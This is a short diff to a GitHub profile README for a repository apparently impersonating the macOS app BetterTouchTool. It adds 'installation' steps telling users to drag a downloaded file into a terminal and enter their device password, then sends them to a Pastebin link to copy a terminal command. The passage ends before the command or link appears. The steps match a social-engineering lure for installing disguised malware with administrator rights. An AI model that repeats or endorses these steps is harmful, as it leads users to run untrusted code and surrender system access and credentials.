BetterTouchTool-Mac/.github/profile/README.md

 ---

+## Installation via .dmg:

+1. Install the .dmg file using the button above.
+2. Open the .dmg installer and move the file from the left window to any convenient directory on your device.
+3. Open a terminal and transfer the file you extracted in the last step into it.
+4. Press the "Return" button, then enter your device password in the window that appears (if you don't have a password, leave the field blank).

 ## Installation via a command in the terminal:

 1. Go to the Pastebin at the link below and copy the command: